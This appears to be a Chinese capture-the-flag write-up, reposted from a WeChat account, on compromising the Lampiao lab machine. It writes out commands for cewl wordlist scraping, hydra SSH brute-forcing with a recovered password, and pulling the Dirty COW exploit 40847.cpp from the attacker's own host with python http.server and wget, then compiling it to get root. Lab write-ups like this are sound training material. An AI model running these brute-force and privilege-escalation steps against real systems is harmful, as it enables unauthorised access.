特色:一是用cewl爬取页面关键词作为字典,爆破;二是dritycow这个大杀器直接提权秒杀;三是这几个靶机都用到exploit-db和searchsploit来查询漏洞。
上篇,孙老师指出了那个hash是sha256,并不是我认为的md5的64位,暴露出了我对这些理解不深不透,还是要加强学习与领悟,三人行必有我师焉。
一、扫描
1、靶机ip:192.168.137.132
2、端口:22、80、1898
3、访问80没什么,访问1898出来个登录窗口,点击read more出来了url
切换下node/2之类的
4、语音和二唯码
提示:user:tiago
http://192.168.137.132:1898/qrc.png
扫描二唯码,没什么用
二、爆破
1、爬取关键词作字典
cewl http://192.168.137.132:1898/?q=node/1 -w dayu.txt
2、爆破ssh
hydra -l tiago -P dayu.txt 192.168.137.132 ssh
用户名:tiago,密码:Virgulino
3、ssh登录
4、网站用的cms?
用dirb跑目录,老是报错
查看了源码,发现是 Drupal 7
三、提权
1、搜索Drupal7漏洞提权,都提到“脏牛”
提到了用40847.cpp,复制到本地
2、传到靶机
python -m http.server 9966
wget http://192.168.137.128:9966/40847.cpp
3、编译
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
含义如下:
4、提权
四、完结
原文始发于微信公众号(MicroPest):cewl爬取+dirtycow提权:Lampiao靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论